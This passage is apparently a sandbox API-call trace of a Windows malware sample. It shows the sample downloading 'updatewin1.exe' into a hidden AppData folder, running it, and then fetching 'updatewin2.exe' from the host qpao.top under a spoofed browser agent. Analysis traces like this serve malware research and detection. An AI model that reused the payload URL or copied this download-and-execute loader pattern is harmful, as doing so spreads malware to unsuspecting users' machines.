lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783" [0125.720] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783", pMore="updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe") returned 1 [0125.721] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x60) returned 0x32c0000 [0125.721] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b4 [0125.721] SetFilePointer (in: hFile=0x5b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.721] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0125.933] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0125.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.018] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.019] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.270] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.270] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.271] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.271] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.271] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.272] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.272] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.272] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.273] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.273] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.273] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.274] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.274] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.275] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.556] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.557] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.558] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.559] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.559] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.559] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.560] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.560] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.560] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.842] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.843] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.843] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.843] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.844] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.844] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.844] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.844] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.845] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.845] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0126.845] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0126.845] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0127.078] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.079] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0127.079] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.080] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0127.080] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.080] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0127.081] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.081] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0127.082] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.083] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0127.083] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0127.083] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0xa00) returned 1 [0127.084] WriteFile (in: hFile=0x5b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0xa00, lpOverlapped=0x0) returned 1 [0127.084] CloseHandle (hObject=0x5b4) returned 1 [0127.088] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0127.093] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0127.095] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0128.349] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x32c0000 | out: hHeap=0x31d0000) returned 1 [0128.349] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5ea3ed8 | out: hHeap=0x31d0000) returned 1 [0128.349] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c0c70 | out: hHeap=0x31d0000) returned 1 [0128.349] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0128.349] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x6359088 [0128.349] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x860) returned 0x6377dc0 [0128.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6359088, cbMultiByte=-1, lpWideCharStr=0x6377dc0, cchWideChar=1072 | out: lpWideCharStr="http://qpao.top/files/penelop/updatewin2.exe") returned 45 [0128.349] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x870) returned 0x62c0c40 [0128.349] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6377dc0 | out: hHeap=0x31d0000) returned 1 [0128.349] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6359088 | out: hHeap=0x31d0000) returned 1 [0128.349] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x870) returned 0x6377dc0 [0128.349] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6324fb0 [0128.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://qpao.top/files/penelop/updatewin2.exe", cchWideChar=-1, lpMultiByteStr=0x6324fb0, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://qpao.top/files/penelop/updatewin2.exe", lpUsedDefaultChar=0x0) returned 45 [0128.349] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x840) returned 0x6325838 [0128.349] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6324fb0 | out: hHeap=0x31d0000) returned 1 [0128.349] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6377dc0 | out: hHeap=0x31d0000) returned 1 [0128.349] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://qpao.top/files/penelop/updatewin2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0128.848] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6325838 | out: hHeap=0x31d0000) returned 1 [0128.848] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0xc85d6d0, lpdwBufferLength=0xc85d710, lpdwIndex=0x0 | out: lpBuffer=0xc85d6d0*, lpdwBufferLength=0xc85d710*=0x4, lpdwIndex=0x0) returned 1 [0128.848] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x40) returned 0x6358fb0 [0128.849] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x20) returned 0x635a1d0 [0128.849] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6358fb0 | out: hHeap=0x31d0000) returned 1 [0128.849] lstrcpyA (in: lpString1=0x62bfbe8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783" [0128.849] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783", pMore="updatewin2.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe") returned 1 [0128.849] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x60) returned 0x635d058 [0128.849] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6b4 [0128.849] SetFilePointer (in: hFile=0x6b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.849] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.048] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.049] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.146] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.146] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.165] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.166] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.166] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.167] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.255] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.255] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.287] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.287] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.288] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.288] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.289] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.289] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.346] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.347] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.374] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.374] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.378] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.379] 